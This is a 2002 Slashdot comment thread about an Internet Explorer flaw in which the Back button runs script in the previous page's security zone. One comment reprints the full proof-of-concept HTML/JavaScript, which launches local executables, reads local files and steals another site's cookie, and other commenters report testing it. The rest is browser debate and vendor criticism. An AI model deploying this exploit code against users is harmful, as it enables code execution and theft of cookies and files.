Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

cancel ×

756 comments

First exploit! (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3356028)

Stupid MS...

Woot (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3356030)

First POst

Haha (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3356034)

I have a mouse button mapped to go back. I don't have to click on that stupid arrow like you freaks.

Go Mozilla! (3, Insightful)

Anonymous Coward | more than 12 years ago | (#3356036)

With every passing week, MS gives us more and more reasons not to use their POS browser. Whereas Mozilla is quickly becoming the undisputed king; tabbed browsing, filtering popups, better security options, and .. oh yeah, it's open source.

Take that, Microsoft. ;-)

Re:Go Mozilla! (0)

Anonymous Coward | more than 12 years ago | (#3356052)

With every passing week, MS gives us more and more reasons not to use their POS browser

Yeah ... if it weren't for the fact that IE is significantly faster than all other browsers, I'd stop using it.

Re:Go Mozilla! (0, Offtopic)

Anonymous Coward | more than 12 years ago | (#3356071)

When was the last time you used Mozilla? 0.9.8 kills IE in terms of speed. MS has to be drooling over Gecko. ;-)

Re:Go Mozilla! (0, Flamebait)

MrBlue VT (245806) | more than 12 years ago | (#3356116)

Opera is much faster than either IE or Mozilla. It just blazes.

Re:Go Mozilla! (0, Offtopic)

sqlrob (173498) | more than 12 years ago | (#3356150)

But it's been crashing left and right on my Win box. Enough that I'm probably going to switch to Mozilla as my default browser once 1.0 comes out.

Re:Go Mozilla! (0)

Anonymous Coward | more than 12 years ago | (#3356152)

Opera?

Tried it out, and contrary to the hype, IE was still faster. Not to mention Opera has a really funky GUI that just dosent feel right. It feels very alien sometimes.

Re:Go Mozilla! (0, Offtopic)

drightler (233032) | more than 12 years ago | (#3356203)

In my experience Mozilla seemed faster than Opera..

Re:Go Mozilla! (0)

Anonymous Coward | more than 12 years ago | (#3356231)

too bad opera uses up more system mem and processor time when open with a few webpages up than any other program i use on a regular basis. Even more than the latest version of MatLab sometimes. (nothing aginst MatLab and how slow it can run) just makes me uncomfortable. -=gabe albert=-

Go Mozilla Anyways! (4, Insightful)

KagatoLNX (141673) | more than 12 years ago | (#3356132)

Bench the latest Mozilla build (turn off debugging and turn on optimization, just like a normal release build) and post that again. Of course, to really shine, run it on Linux or a free BSD.

Seriously, it's fast and its implementation of little things like CSS (which as far as I'm concerned is the future of online content) is light years ahead if IE anyways.

Then again, you might be interested to know that as of IE 5.5, IE was backported from the Macintosh version. That's right, the MS-IE-Mac-port team did it so much better that they backported it to Windows. That's where the speed and decent standards support came from!

I think that this goes to show that Microsoft doesn't re-write something from scratch on purpose. They had to force their Mac team to basically do so (because, like, it's IE not on Windows, you have to redo a bunch of stuff) before they figured out that they needed to reimplement. The sad thing is that they don't seem to be willing to do it where it counts, no matter how "security focused they become" they don't ever figure out that it's impossible to effectively rewrite Windows "a piece at a time".

Re:Go Mozilla! (0)

Anonymous Coward | more than 12 years ago | (#3356062)

You're right.

IE 5.0 and 5.5 are in precipitous decline [google.com] .

Moz is making huge inroads!

Re:Go Mozilla! (0)

Anonymous Coward | more than 12 years ago | (#3356108)

What are you talking about? Did you the MSIE6 rocket up the chart? It's clear that the reason MSIE's 5 and 5.5 are losing users is becasue they're upgrading to 6.0. The "others" line on the chart has remained fairly constant.

Re:Go Mozilla! (0)

Anonymous Coward | more than 12 years ago | (#3356129)

>It's clear that the reason MSIE's 5 and 5.5 are losing users is becasue they're upgrading to 6.0. The "others" line on the chart has remained fairly constant.

Pffft. That's a load. The chart clearly shows a heavy decline and here's [dictionary.com] proof of it.

This week: Is a God Damn Week Off (-1)

Fecal Troll Matter (445929) | more than 12 years ago | (#3356091)

Filthy says:
"a long-overdue
move by the
Filthy Critic!"

Opera (0)

Anonymous Coward | more than 12 years ago | (#3356171)

Don't be silly. Opera is king, and always will be. www.fudo.org in the phorums for in depth conversations on this. Mozilla = Sex with Porcupine Opera - Sex with MILF. Need I say more?

In other news (0, Funny)

Anonymous Coward | more than 12 years ago | (#3356043)

Don't hit that 'REPLY' button. It may post a goatse link!!!

Re:In other news (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3356066)

Nicely done sir.

So... (1, Insightful)

NetRanger (5584) | more than 12 years ago | (#3356044)

...

Sheesh, what really needs to be said here? Internet Explorer is full of more bugs than a $19.95 roadside motel. I can't wait for the explaination for this one out of Monopolis (AKA Redmond, WA).

Re:So... (1)

Spencer Fry (559792) | more than 12 years ago | (#3356054)

Now we can't even hit the Back button. :( What's next? Go?

Re:So... (2)

Cramer (69040) | more than 12 years ago | (#3356123)

That assumes you have a support contract so they'll pay you any attention at all. Good luck simply getting the "feedback" page so you can submit a bug (which no one will ever look at.)

Re:So... (0)

gewalker (57809) | more than 12 years ago | (#3356130)

I wanna work for Microsoft.

Apparently, in addition to free sodas, you get free drugs of your choice too.

Re:So... (0)

Anonymous Coward | more than 12 years ago | (#3356232)

This isn't really a bug, per se. It's an exploit, using good ole' javascript.

On a (somewhat) related topic... (4, Interesting)

webword (82711) | more than 12 years ago | (#3356045)

Attack of the Back Button [webword.com] -- "Getting stuck on a web page can be painful. The back button doesn't always work. While there are many ways to escape from web pages, many users don't know the tricks. A company can stop hurting users by doing more testing, using proper development methods, and being aware of the issue."

yearning for the past (4, Insightful)

Faust7 (314817) | more than 12 years ago | (#3356217)

When I spent hours in labs browsing with Netscape 2.0...

When a webpage wasn't something you had to figure out how to escape...

When 'Back' meant back...

When there was just smooth uninterrupted navigation, and no pop-ups or banners...

When people could say pretty much say anything anywhere, no DMCA...

... remember that?

What, I can't go back? (1)

Ayatollah (172519) | more than 12 years ago | (#3356046)

I wanted to go back and vote on the poll!

Someone pick "insurace companies" for me.

Unless you can't go back either.

Hmmm....

caught as a virus (1, Interesting)

Anonymous Coward | more than 12 years ago | (#3356047)

Interestingly enough, McAfee caught it and labled it a .vir right after I doubled clicked on the test html....

lets see.. (0)

HobbitGod42 (568144) | more than 12 years ago | (#3356048)

Posted to MS in november and it still happens... I would think that this would be a top priority to get fixed. only because it can be uses in bad ways.

Using Linux considered harmful (0, Troll)

Anonymous Coward | more than 12 years ago | (#3356051)

Using open source software is harmful as well, pressing any button is likely to cause it to segfault

Re:Using Linux considered harmful (5, Funny)

Anonymous Coward | more than 12 years ago | (#3356097)

Linux advocacy on IRC, in a nutshell:

Q: Internet Explorer has a lot of security bugs. What do I do?

A: Install Mozilla.

Q: Windows has a lot of security bugs. What do I do?

A: Install Linux.

Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?

A: Didn't you RTFM? Everybody knows that you have to keep patching the system to keep people out of it! Why don't you go to Windows, dumbass?

Re:Using Linux considered harmful (1, Insightful)

Corporate Drone (316880) | more than 12 years ago | (#3356135)

No, you mean:


A: Didn't you RTFM? Everybody knows that you have to configure the system correctly and intelligently in order to keep people out of it! Why don't you go to Windows, where the default install is the only one they expect people to execute?

Pretty intresting... (1)

Mashiki (184564) | more than 12 years ago | (#3356055)

But it shows a definate flaw in the design of the browser. The source of the HTML has some intresting stuff in it as well...though I am surpised that this applies to all versions of IE. I suppose this comes down to IE executing scripts outside of the sandbox huh? Pretty simple to fix, disable all java script.

Please note that I'm not responsible if that breaks websites.

Java's been crashing IE of late (2, Insightful)

blair1q (305137) | more than 12 years ago | (#3356056)

So it may not matter.

http://arizona.diamondbacks.mlb.com crashes both IE6 and IE5.

I don't know why. Could be the address it crashes at has a hardware problem on my machine. But why is java poking around my hardware?

Java is insecure, Windows is insecure, the Internet is insecure, and everyone using them has always known that.

--Blair

Re:Java's been crashing IE of late (1)

Mashiki (184564) | more than 12 years ago | (#3356067)

Are you sure it's IE and not some type of scum ware that's crashing your browser? 3 diffrent machines running IE 4, 5, and 6 here at my home run the site fine. I would wager it's your machine that has a problem somewhere.

Re:Java's been crashing IE of late (2)

mattr (78516) | more than 12 years ago | (#3356086)

Not true with my copy (Win2K Japanese, IE5.50)if same url.

Redirects to http://arizona.diamondbacks.mlb.com/NASApp/mlb/ari / omepage/ari_homepage.jsp

Re:Java's been crashing IE of late (0)

Anonymous Coward | more than 12 years ago | (#3356096)

I noticed the same thing a couple of days ago, a clean boot seemed to fix whatever was going on.

It hasn't reared its ugly head again since.

Re:Java's been crashing IE of late (3, Insightful)

evil_one (142582) | more than 12 years ago | (#3356105)

My roommate had IE crash on any site that used Javascript. Then I removed the spyware from his computer. Wow... what a difference.

Re:Java's been crashing IE of late (0)

Anonymous Coward | more than 12 years ago | (#3356158)

JavaScript != Java

In fact, they're totally different.

Re:Java's been crashing IE of late (0)

Anonymous Coward | more than 12 years ago | (#3356120)

"java is insecure"

its sad that people fail to realize the difference between java and javascript, cause they are completely different.

Re:Java's been crashing IE of late (5, Informative)

asv108 (141455) | more than 12 years ago | (#3356145)

Java is insecure

I think your reffering to JavaScript orginally called livescript by Netscape before the Java buzz hit. JavaScript has nothing to do with Java. Java is relatively secure by most standards. [sun.com]

Re:Java's been crashing IE of late (1)

Cramer (69040) | more than 12 years ago | (#3356147)

... and no URL containing 'http://www.hp.com/' will be cached. And before you tell me the same bullshit as microsoft, there is nothing at all in the communications to indicate it shouldn't be cached. Use any one of the IP addresses or simply "www.hp.com." (note: tailing period) and it caches just fine.

It happens in every version of IE on every version of Windows.

Re:Java's been crashing IE of late (1)

Peyna (14792) | more than 12 years ago | (#3356194)

Uh, what on earth are you talking about? I cannot replicate this problem.

Re:Java's been crashing IE of late (1, Offtopic)

revscat (35618) | more than 12 years ago | (#3356181)

Java is insecure

No, JavaScript implementations can be insecure, or VBScript can be insecure, but Java is very, very secure.*

Methinks you are confusing JavaScript with Java. They're only related tangentially at best.

* This being /. this point is, of course, infinitely debatable.

Re:Java's been crashing IE of late (0)

Anonymous Coward | more than 12 years ago | (#3356184)

Java and Javascript, surprisingly, have nothing in common besides similar names.

Re:Java's been crashing IE of late (1)

Verteiron (224042) | more than 12 years ago | (#3356220)

Works fine here. IE6 & Win2k w/all updates.

Works fine with Mozilla, too, under Windows & Linux.

Oh wow (-1, Redundant)

Anonymous Coward | more than 12 years ago | (#3356057)

Right on! What a hole! I don't think I've seen a bigger miss on part of the Microsoft crew in over a week!

This doesn't worry me. (4, Funny)

Anonymous Coward | more than 12 years ago | (#3356060)

I don't have anything special in my Google cookies and I like to play minesweeper.

Re:This doesn't worry me. (1)

flikx (191915) | more than 12 years ago | (#3356083)

This would be better for most people if this exploit executed solitaire instead.

What are the odds... (-1, Troll)

jargonCCNA (531779) | more than 12 years ago | (#3356063)

that this is probably the first Microsoft's heard of this bug, and by the end of the week they'll have a "Critical Update" for us SE users and a forced bug fix for everybody on XP?

Big whoop, considering the people who know about it (cough, /. readers, cough) generally seem to support Mozilla. Feh.

Re:What are the odds... (0)

Anonymous Coward | more than 12 years ago | (#3356121)

> and a forced bug fix for everybody on XP?

WTF are you talking about? Do you even use XP? There are no "forced" fixes that I've seen. (Unless you're an idiot, and you specificly told XP to automaticly download and install all fixes.) XP does _NOT_ force fixes on me. Simply put, whenever a new update is available, a little tiny globe pops up by my clock and says "Hey, there's a new update."

I can click on it if I want, it doesn't take control of my mouse. It doesn't force me to click on it.

Once I _DO_ click on it, it simply states:

"There is such and such a fix, as per this KB article. Click [here] to read on the fix. Click [install] to install, [remind me later] to remind me later, or [go the fuck away] to have this go away."

Quzah.

Re:What are the odds... (0)

Anonymous Coward | more than 12 years ago | (#3356140)

Yea, they were only notified Nov. 21, 2001 and then notified again with more info Mar. 25, 2002. They had no clue..

I would've posted the exploit... (0, Offtopic)

Any Web Loco (555458) | more than 12 years ago | (#3356070)

... but the damn lameness filter got me. I can't even whore for karma - i'm too lame. gutted.

statistical predictions (0)

Anonymous Coward | more than 12 years ago | (#3356076)

IE has had so many security issues it's not even funny, yet it remains the most used browser on the internet.

What would be really nifty is is somebody started tracking the bugs in IE, and when they are reported. I bet you could start to predict the next one by using incedents, lines of code, and release number.

I predict there will be a new one right about

Now.

"Do or do not, there is no try." -Yoda

Oh good grief! (0, Flamebait)

Chas (5144) | more than 12 years ago | (#3356080)

*Pause*

*DEEP BREATH!*

*SIGH!*

And people wonder why the hell I turn off Java and Javascript....

And it will until the dubious day that M$ gets its "shiznatz" straight.

But NOOO! It's SO much "cooler" to have a bunch of javascript crap in your page just to make it that much harder to browse!

Security my 3X wide, high-arched, hairy-toed, bunioned FOOT!

Re:Oh good grief! (0)

Anonymous Coward | more than 12 years ago | (#3356122)

There are legitimate uses. Recently on the CSS mailing list a couple of javascript patches have been discussed to get around the bugs in IE's page rendering engine... (These actually make it possible to make sites *easier* to browse.)

How far can you exploit this? (3, Interesting)

Agelmar (205181) | more than 12 years ago | (#3356081)

Would a vulnerability still exist if a user wrote a page that redirected the browser to some page with malicious code in the target, and then, with a little bit of javascript set the location to javascript:history.back() (i.e. on mouse movement or whatever). Would this cause the javascript to run under the improper security settings, or does the user actually have to hit the "back" button?

RTFE (exploit) (5, Informative)

gartogg (317481) | more than 12 years ago | (#3356187)

If you read the exploit, you would see why this would not be possible.

You do not need to actually press the button, but you need to do it from a trusted page.

How about from a frame? (2)

roystgnr (4015) | more than 12 years ago | (#3356219)

Would it be possible for a malicious page to load a trusted page in another frame, pause for it to load, then execute a back() in that frame? There are loads of things that javascript isn't allowed to do in a frame from another website, but is back() among them?

The worst thing about the Bug is: (1)

VonSnaggle (64586) | more than 12 years ago | (#3356089)

The worst thing about the Bug is that "Exploit has only been tested on fully patched IE 6.0, with Win XP and Win2000 pro" I cant wait to automatically install Gator when I accidently click a popunder advertisment and try to back out of it. I guess I should update my IE 6.0 ... Oh wait that doesn't work.....

Proof-of-Concept (2, Redundant)

acm (107375) | more than 12 years ago | (#3356093)

<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system 32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/syst em32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"& gt;
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com / )">
Read Google cookie</a>

<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>

And the #1 workaround is...... (1)

Beowulfto (169354) | more than 12 years ago | (#3356102)

Using a browser other than IE.

(As the author of this reply submits it via IE. Ah, the irony :-)

Unfair to release the advisory before fix... (5, Funny)

NoMoreNicksLeft (516230) | more than 12 years ago | (#3356103)

If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole. SP3 for IE6 patches it up fine though. That's right, when you mouseover the back button, a popup text alerts you that it might be dangerous (that M$ can't be held responsible for damages resulting from its use?). Also, the "Safe Back Button" is now next to it, but to get it out the door in time, they've had to rush. Yes folks, it uses the exact same codebase as the back button, and no, I don't see that as a problem. Besides, if it is, they'll fix it with SP4, and the "Really Safe Back Button". Right along side the other two, for backward compatibility.

If MS had acted... any number of times... (5, Informative)

Wee (17189) | more than 12 years ago | (#3356228)

If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole.

If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven my the needs of the marketing group.

You find a hole, you do due dilligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.

It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.

But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...

-B

GPL? (0)

Anonymous Coward | more than 12 years ago | (#3356104)

Doesn't this violate the GPL?

No. (-1)

Anonymous Coward | more than 12 years ago | (#3356149)

(N/T)

YHBT. YHL. HAND.

Re:No. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3356215)

Babelfish: English -> German -> English

If you do not strike that the back key, which is communicated by Timotheegras on Tuesday April 16, @11:10PM of the burning their bridges abbott of holy Aardvark writes: " of the transmitting list Bugtraq comes this WARNING: ' the back key in IE to use is dangerous. If one strikes the back key, executed Javascript on the left of in security zone of the last outstanding URL the proof of concept, which is covered in the WARNING, executes Minesweeper or reads its Plaetzchen Google.

hm (1)

AA0 (458703) | more than 12 years ago | (#3356106)

I still can't figure out why people are using IE, seriously. I use opera, and its is so much more stable it isn't funny. The speed and resources used are much better. I love mouse gestures, and I've removed the whole back button panel, I just hold the right mouse down and click the left, to go forward, hold the left and click right.

The only complaint, is that some improper css and js screw with it. Its far better then dealing with IE bugs, especially if people were to start using opera, then webpages would be tested with it.

Re:hm (2, Insightful)

jspaleta (136955) | more than 12 years ago | (#3356161)

" I still can't figure out why people are using IE, seriously."

1)Bundled....people are sheep.
2)Bundled.....a lot of people dont have the band or the patience to do a lot of downloading (AOL users on dialup)
3)Bundled...on a corporate win2k desktop where the user just logins in and cant really install much in the way of software...see 1) s/pc support personal/people

-jef

Re:hm (0)

Anonymous Coward | more than 12 years ago | (#3356207)

Believe it or not, there are a lot of people who don't find Opera pleasing. Not to mention that when I have tested it against IE, it isn't in fact faster. The GUI sucks and the program itself tends to crash more than IE.

The only other option would be the Moz, which is growing on me. As for Opera, keep that hyped turdware away from me please..it just doesn't feel right when using it.

Test it out if you have IE (5, Informative)

ekrout (139379) | more than 12 years ago | (#3356107)

I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html [bucknell.edu] for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.

This is a very troubling security hole for Windows users who prefer IE (99.7% of them).

Founder, monolinux [monolinux.com]

Re:Test it out if you have IE (1)

rbohac (534934) | more than 12 years ago | (#3356186)

worked on win2k with IE5.5

Re:Test it out if you have IE (2, Funny)

Tjp($)pjT (266360) | more than 12 years ago | (#3356193)

I guess IE on the Mac works better. No such problems there.

Yeah right! As IF! (0)

Anonymous Coward | more than 12 years ago | (#3356208)

What the hell... YUP. Hey, you're formatting my hard drive! Bastard! :)

(IE6 + XP [Un]Professional)

Re:Test it out if you have IE (2)

Quietust (205670) | more than 12 years ago | (#3356210)

The Minesweeper one only worked after I created the directory and copied in the EXE.
One of the advantages of having Windows 2000 installed on drive D (except for the fact that I have a rather outdated install of Win98SE on drive C; gotta get rid of that one of these days).
What bothers me is that it still worked even after I changed the default security level for Local Intranet to High (maximum)...

Re:Test it out if you have IE (0)

Anonymous Coward | more than 12 years ago | (#3356214)

Worked on Win2k with IE6. I would like to subscribe to your illustrated newsletter and, if you don't mind, bear one or more of your children.

Re:Test it out if you have IE (1)

vlauria (14396) | more than 12 years ago | (#3356218)

I'm running IE6, and these exploits work

My company's solution to IE (4, Interesting)

Ali Jenab (565034) | more than 12 years ago | (#3356110)

It's been almost five years since Microsoft released their first acknowledgement of a security vulnerability in Internet Exploder. I remember the day that happened clearly; if only I had the foresight at the time to see that the same exact scene would play out, on the average, once every two weeks for the next five years. I could have avoided disaster for my company.

Back in 1999, when the dot-coms were flying high and my company resembled an Internet startup (although we had been in business since 1992), we hastily set up new offices and cubicles with little regard for information security. After all, what was the worst that could happen - an email worm? Well, we quickly found out: a malicious hacker had targeted our company, and sent an email to "all @" my domain containing a link to a supposed Yahoo News story. Unfortunately, this link sent the employees to a malicious site that caused their insecure IE browsers to yield control of nearly every Windows PC in the company to the intruder. They stole and destroyed much important data, and took over a week of nonstop unpaid overtime to fix things.

A few weeks after the incident, our vice president of operations mandated a Mozilla-only policy. Employees were forbidden from running IE, Lynx (another notoriously insecure browser), and Konqueror (which crashed constantly anyway). Since that time, we have had zero browser related security issues, and employees waste far less time surfing the web, mainly because a lot of time-wasting sites only work in Microsoft standards-compliant browsers. Converting to Mozilla has been a win-win situation, and I fully expect the same to be happening across America after this latest IE security breach. Enough is enough; we need to take back control of our networks.

/ali

BULLSHIT (n/t) (0)

Anonymous Coward | more than 12 years ago | (#3356198)

n/t = nice troll

Re:My company's solution to IE (-1)

honold (152273) | more than 12 years ago | (#3356211)

yeah, lynx is so insecure openbsd includes it in their base system!

This catch anyone's eye? (4, Insightful)

Omerna (241397) | more than 12 years ago | (#3356112)

"Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002."

That's pretty long time (5-6 months, too lazy to figure out the actual number of days etc.) that Microsoft has done nothing (at least not a fix). Especially because this overlaps the time when they decided to make their people go to security workshops (or some such). If they can't even fix a known, reported bug in the security how can they find them on their own and fix them? Or not write them in the future?

Oh yeah, it'd be nice to know if I can get around this by doing "right-click" / "back" or if that is affected and not JUST the toolbar.

Re:This catch anyone's eye? (1)

Merlynnus (209292) | more than 12 years ago | (#3356180)

Nope, rt-click|Back triggers the same exploit, as does (I imagine, but haven't tried) the good old javascript:history.back()

A>

IE as a precursor for MS decline?? (1)

littlerubberfeet (453565) | more than 12 years ago | (#3356113)

Are the problems with MS and the fast approching 1.0 release of Mozilla signs that IE is fading? Let us postulate yes for a second. IF we do, then might we consider that the decline of IE is a sign that MS and most of its applications are going to slowly wither as faster better and cheaper alternatives become availible? (despite the fact that engineers say faster better cheaper pick any two). Assuming that IE is foreshadowing the decline of many MS apps and OSs in the future, what will replace them? MS makes some usefull, albiet very buggy software (Office). It is a shame there is no better standard for computer users. Can MS shift its buisness focus to software exclusivly? or perhaps to the OS market exclusivly and dump Office and the rest under Open-Source. I think these are interesting possibilities to explore.

Even for slashdot... (0)

Anonymous Coward | more than 12 years ago | (#3356114)

the back button doesn't work as expected. I end up opening every link in a new window, closing windows becomes my back button. Is it really hard to make the back button have *exactly* this behavior? (hint, if pressing the back button reloads the page, you have failed.) Looks like programmers avoid doing the simplest thing because bloat is expected these days.

The best browser? (1)

gordgekko (574109) | more than 12 years ago | (#3356119)

This doesn't exactly strengthen the arguments of those who believe that IE is the best browser (cough, cough, such as yours truly), that's for sure.

This little incident explains in detail why I've slowly stripped as much Microsoft software from my system as possible. Unlike many on /. I don't have an innate bias against Microsoft and don't mind using their software if it gets the job done but if even using the back button on my browser can someone fsck me up, well, it's time to consider some radical alternatives. Linux and a browser should run pretty sweet on a 1Ghz AMD...

Back buttons (3, Funny)

56ker (566853) | more than 12 years ago | (#3356125)

" 'Using the Back Button in IE is dangerous'." - since when was using anything in IE safe? ;o)

A complete list (2)

rosewood (99925) | more than 12 years ago | (#3356126)

Other then just clicking on the MS link, is there a site devoted just to the fuckups of MS? From calling the GPL cancer to dumb ass bugs like this, I would love a good site so that every time I see a post on shacknews that says "People just hate MS because everyone hates them, Windows 98 was fine and worked great for me"

Already tagged as virus by McAfee (1, Informative)

Anonymous Coward | more than 12 years ago | (#3356134)

I copied the HTML onto my webserver deliberately, and tried it out -- the exploit worked as expected EXCEPT when my virus scanner was on. Then I couldn't even save the web page when I copied the text to it. So a virus scanner prevents a IE bug? Weird.

Makes it easy to explain M$ vs. Free Soft (2)

mattr (78516) | more than 12 years ago | (#3356137)

At first I thought wuh? But of course I was in Mozilla, so I didn't see the problem. IE executed it exploit right away.

Free Software ought to get better press from this, as it underscores a major truism.

In Free Software, new versions are generally made and released due to added functionality or fixed bugs. Anything else is a waste of time for the programmers, right?

With the exception of a very huge vulnerability that was finally fixed with IE SP2 (though who knows what else that contained), new software versions from Microsoft seem due to an entirely different set of reasons, like:

- breaking more fledgling standards
- making news
- embracing/extending
- press releases
- etc

Use of "Back" considered dangerous... (1)

Corporate Drone (316880) | more than 12 years ago | (#3356151)

Nice.


In Microsoftese, this is called "innovation".


Of course, can you name one feature of IE that isn't dangerous? Well, other than clicking File/Close ...

Patch (1)

sohp (22984) | more than 12 years ago | (#3356159)

Mozilla [mozilla.org] 1.0 RC1 release possible tomorrow.

history.go(-1) (1)

rbohac (534934) | more than 12 years ago | (#3356163)

Can you invoke this by using history.go(-1); ?

Can't Blame Bill, It's His Code (0)

Devil's BSD (562630) | more than 12 years ago | (#3356168)

Maybe the reason M$ hasn't fixed it yet is because their code is so crappy, no one can figure out how. The article mentions the particular Show Doc file (SHDOCLC.dll), which is full of bugs in itself [aol.com] . I mean, if M$ can't even get a STUPID HYPERLINK THAT A NOVICE HTML'ER CAN DO right, then how can we expect them to get a whole browser package right?

M$'s new focus on security... (1)

Corporate Drone (316880) | more than 12 years ago | (#3356201)

OK.. so, let's make sure I've got this straight...

In November 2001, Microsoft was contacted about the existence of this bug...

This year, Bill Gates sent a memo to Microsofties, encouraging Microsoft S/W engineers were to (1) double their focus on writing secure software and (2) perform a review of all software for security vulnerabilities.

OK, so if this memo was anything more than a PR gimmick, they'd start with known vulnerabilities, right?

right...

So much for trustworthy computing... (1, Troll)

coupland (160334) | more than 12 years ago | (#3356202)

Microsoft seems to really be taking it in the shorts of late -- you can't help but feel a little sympathy watching the pathetic Benny-Hill skit that is their attempt at "trustworthy computing". Feels like the blonde's lost her dress and an angry mob is chasing Gates through the streets of London in double-time. Even hindsight [slashdot.org] makes it seem that much more pathetic.

see? Microsoft _does_ innovate! (1, Troll)

jdbo (35629) | more than 12 years ago | (#3356209)

This is one of the most beautiful bugs I've ever seen - Microsoft is clearly an innovator in bringing ever-more-advanced, aesthetically-pleasing bugs to customers.

Seriously though... there is a true elegance to this vulnerability that one rarely sees in the usual passel of buffer overflows, etc.

This bug combines a canonical and visceral piece of browser functionality (back-button) with a conceptually and technically advanced, as well as invisibly-controlled piece of browser functionality (site-specific browser security settings). What wonderful juxtaposition!

C'mon! At least this is far better than the usual "ironic" bugs that come up (i.e. default passwords in a security program - har-de-har-snore).

Another Bug (1)

Wheaty18 (465429) | more than 12 years ago | (#3356221)

If you type
dev://developers
in the URL bar of IE, it plays the video of Steve Balmer showing off his dancing movez...

ARGHHH! (1)

fizban (58094) | more than 12 years ago | (#3356230)

Don't say the word "minesweeper!"

Must...not...play...addictive...game...any...mor e. .

I had the habit kicked and then you went and threw me into a relapse. Shite. Oh well, here goes another 30 wasted minutes of my time...

I hit the back button (1)

AX.25 (310140) | more than 12 years ago | (#3356234)

And this [slashdot.org] poped up. Was I hacked?
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...